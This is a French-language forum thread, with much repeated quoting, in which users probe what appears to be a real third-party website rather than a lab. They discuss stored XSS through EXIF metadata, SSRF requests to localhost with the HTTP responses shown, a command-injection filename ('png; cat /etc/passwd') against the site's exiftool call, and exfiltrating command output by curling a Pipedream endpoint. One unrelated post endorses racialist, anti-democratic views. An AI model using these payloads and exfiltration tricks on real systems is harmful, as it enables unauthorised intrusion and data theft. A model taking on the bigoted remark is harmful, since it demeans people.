Ce sujet a été résolu
Comment tu sais dans quelle dossier ils sont stocké ?
"On peut aussi scanner un serveur apache dans son localhost" rien confruit tu parle d'une ssrf ?
c'est un ctf ou un vrais site ?
"On peut aussi scanner un serveur apache dans son localhost" rien confruit tu parle d'une ssrf ?
c'est un ctf ou un vrais site ?
il y a 3 mois
dans les exif ou le header content-type ?
Si le header content-type accepte des trucs aussi random faudrait tester d'upload autre chose que des images
Si le header content-type accepte des trucs aussi random faudrait tester d'upload autre chose que des images
Dans les exifs, une fois l'image sur le site la XSS s’exécute car le site output les exifs. Tu peux upload ce que tu veux même un .php mais nous avons pas de moyen de l’exécuter ensuite pour le moment
il y a 3 mois
ah mdr
t'a testé de mettre un payload RCE dans le nom du fichier ? vue qu'il lance la commande exiftool dessus.
c'est quoi cette passoire de fou que vous avez chopper
t'a testé de mettre un payload RCE dans le nom du fichier ? vue qu'il lance la commande exiftool dessus.
c'est quoi cette passoire de fou que vous avez chopper
il y a 3 mois
Comment tu sais dans quelle dossier ils sont stocké ?
"On peut aussi scanner un serveur apache dans son localhost" rien confruit tu parle d'une ssrf ?
c'est un ctf ou un vrais site ?
"On peut aussi scanner un serveur apache dans son localhost" rien confruit tu parle d'une ssrf ?
c'est un ctf ou un vrais site ?
Le site utilise une URL dans le lien afin de récupérer des infos et les display sur la page, si tu remplace l'url par localhost ou 127.0.0.1 ça donne ces infos sur la page :
HTTP/1.1 200 OK
Date Fri, 25 Apr 2025 17:27:04 GMT
Server Apache
Content-Length 0
Content-Type text/html; charset=UTF-8
Pas sûr si c'est une SSRF pour le moment..
HTTP/1.1 200 OK
Date Fri, 25 Apr 2025 17:27:04 GMT
Server Apache
Content-Length 0
Content-Type text/html; charset=UTF-8
Pas sûr si c'est une SSRF pour le moment..
il y a 3 mois
Le truc c'est que si tu fais la même chose avec l'IP du site ça donne cloudflare en server et non Apache :
HTTP/1.1 403 Forbidden
Date Fri, 25 Apr 2025 18: 30:55 GMT
Content-Type text/plain; charset=UTF-8
Content-Length 16
Connection close
X-Frame-Options SAMEORIGIN
Referrer-Policy same-origin
Cache-Control private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires Thu, 01 Jan 1970 00:00:01 GMT
Server cloudflare
CF-RAY
HTTP/1.1 403 Forbidden
Date Fri, 25 Apr 2025 18: 30:55 GMT
Content-Type text/plain; charset=UTF-8
Content-Length 16
Connection close
X-Frame-Options SAMEORIGIN
Referrer-Policy same-origin
Cache-Control private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires Thu, 01 Jan 1970 00:00:01 GMT
Server cloudflare
CF-RAY
il y a 3 mois
Le site utilise une URL dans le lien afin de récupérer des infos et les display sur la page, si tu remplace l'url par localhost ou 127.0.0.1 ça donne ces infos sur la page :
HTTP/1.1 200 OK
Date Fri, 25 Apr 2025 17:27:04 GMT
Server Apache
Content-Length 0
Content-Type text/html; charset=UTF-8
Pas sûr si c'est une SSRF pour le moment..
HTTP/1.1 200 OK
Date Fri, 25 Apr 2025 17:27:04 GMT
Server Apache
Content-Length 0
Content-Type text/html; charset=UTF-8
Pas sûr si c'est une SSRF pour le moment..
Attends tu as eu une réponse HTTP 200 (Ok) ???
Sur quelle ressource ? J'ai que des 404 sur son localhost.
Sur quelle ressource ? J'ai que des 404 sur son localhost.
il y a 3 mois
miko
3 mois
Le truc c'est que si tu fais la même chose avec l'IP du site ça donne cloudflare en server et non Apache :
HTTP/1.1 403 Forbidden
Date Fri, 25 Apr 2025 18: 30:55 GMT
Content-Type text/plain; charset=UTF-8
Content-Length 16
Connection close
X-Frame-Options SAMEORIGIN
Referrer-Policy same-origin
Cache-Control private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires Thu, 01 Jan 1970 00:00:01 GMT
Server cloudflare
CF-RAY
HTTP/1.1 403 Forbidden
Date Fri, 25 Apr 2025 18: 30:55 GMT
Content-Type text/plain; charset=UTF-8
Content-Length 16
Connection close
X-Frame-Options SAMEORIGIN
Referrer-Policy same-origin
Cache-Control private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires Thu, 01 Jan 1970 00:00:01 GMT
Server cloudflare
CF-RAY
CloudFlare c'est l'hébergeur et donc il masque le header de serveur de ses clients quand vous les contacté via leur ip publique.
Il agit comme un proxy
Il agit comme un proxy
il y a 3 mois
ah mdr
t'a testé de mettre un payload RCE dans le nom du fichier ? vue qu'il lance la commande exiftool dessus.
c'est quoi cette passoire de fou que vous avez chopper
t'a testé de mettre un payload RCE dans le nom du fichier ? vue qu'il lance la commande exiftool dessus.
c'est quoi cette passoire de fou que vous avez chopper
Tu voudrais dire du style nomdufichier.png; cat /etc/passwd
par exemple ?
par exemple ?
il y a 3 mois
Attends tu as eu une réponse HTTP 200 (Ok) ???
Sur quelle ressource ? J'ai que des 404 sur son localhost.
Sur quelle ressource ? J'ai que des 404 sur son localhost.
localhost et 127.0.0.1 me donne tous des HTTP 200 sur l'output de la page du site
il y a 3 mois
Tu voudrais dire du style nomdufichier.png; cat /etc/passwd
par exemple ?
par exemple ?
ui
il y a 3 mois
pipdream c'est juste un api publique crée en deux minute que tu peu appeller.
Genre si tu curl
https://monlienpipdream2f[...]_resultat_de_la_commande}
tu verra le res de la commande dans les logs de ton pipdream
et t'a bypass le faite que tu ais pas l'ouput
Genre si tu curl
tu verra le res de la commande dans les logs de ton pipdream
et t'a bypass le faite que tu ais pas l'ouput
il y a 3 mois
pipdream c'est juste un api publique crée en deux minute que tu peu appeller.
Genre si tu curl
https://monlienpipdream2f[...]_resultat_de_la_commande}
tu verra le res de la commande dans les logs de ton pipdream
et t'a bypass le faite que tu ais pas l'ouput
Genre si tu curl
tu verra le res de la commande dans les logs de ton pipdream
et t'a bypass le faite que tu ais pas l'ouput
c'est aussi utile pour les xss
il y a 3 mois
Tu es très bien payé en cybersécurité si c'est ce que tu veux savoir et ce n'est pas bouché
il y a 3 mois
Il n'est jamais trop tard
J'ai 31 ans, j'ai déjà fait deux reconversions. C'est fini.
Je vais peut-être devenir PROGRESSIVEMENT meilleur en cybersécurité, car en lien avec mon job principal (après tout hier j'ai pété un windows), mais je n'atteindrais pas un niveau digne d'un bac+5.
Je le sais, car j'ai FAIS mon stage dans une boite qui fait de la cyber.
L'écart de niveau, de technique mais surtout de SAVOIR DE BASE est abyssale.
Par exemple, on m'a parlé d'attaque par empilement, de flippe, spoofing, etc
Je ne pigeais pratiquement RIEN. Je connais des méthodes classiques et simples comme le bruteforce et le phising, mais ça s'arrête là. Sans parler du reste : docker, architecture de programme, CI CD
J'étais en PLS astrale. Je suis heureux qu'on m'aie donné une chance. Mais bordel là je me suis rendu compte que la Cyber c'était pas possible.
Je vais peut-être devenir PROGRESSIVEMENT meilleur en cybersécurité, car en lien avec mon job principal (après tout hier j'ai pété un windows), mais je n'atteindrais pas un niveau digne d'un bac+5.
Je le sais, car j'ai FAIS mon stage dans une boite qui fait de la cyber.
L'écart de niveau, de technique mais surtout de SAVOIR DE BASE est abyssale.
Par exemple, on m'a parlé d'attaque par empilement, de flippe, spoofing, etc
Je ne pigeais pratiquement RIEN. Je connais des méthodes classiques et simples comme le bruteforce et le phising, mais ça s'arrête là. Sans parler du reste : docker, architecture de programme, CI CD
J'étais en PLS astrale. Je suis heureux qu'on m'aie donné une chance. Mais bordel là je me suis rendu compte que la Cyber c'était pas possible.
Je ne suis pas patriote ou nationaliste. Je ne l'ai jamais été. Juste racialiste et anti européen. démocratie = scam.
il y a 3 mois
__Lain__
3 mois
des gens qui sont sur root-me ?
je suis moins fan de thm perso
je suis moins fan de thm perso
Pas encore, je commence via thm pour apprendre bien toutes les bases et ensuite je compte passer sur hackthebox et root-me
Je viens de penser à un truc pour la XSS par contre, le site récupère le titre des pages que tu lui donne et les outputs sur la page, ça veut dire avec ton propre serveur tu crée juste une page qui a comme titre un payload XSS et ça devrait le faire
Je viens de penser à un truc pour la XSS par contre, le site récupère le titre des pages que tu lui donne et les outputs sur la page, ça veut dire avec ton propre serveur tu crée juste une page qui a comme titre un payload XSS et ça devrait le faire
il y a 3 mois
Pas encore, je commence via thm pour apprendre bien toutes les bases et ensuite je compte passer sur hackthebox et root-me
Je viens de penser à un truc pour la XSS par contre, le site récupère le titre des pages que tu lui donne et les outputs sur la page, ça veut dire avec ton propre serveur tu crée juste une page qui a comme titre un payload XSS et ça devrait le faire
Je viens de penser à un truc pour la XSS par contre, le site récupère le titre des pages que tu lui donne et les outputs sur la page, ça veut dire avec ton propre serveur tu crée juste une page qui a comme titre un payload XSS et ça devrait le faire
oui si c'est pas filtré ça peu le faire
vue que le truc à l'air sacrement bancal
vue que le truc à l'air sacrement bancal
il y a 3 mois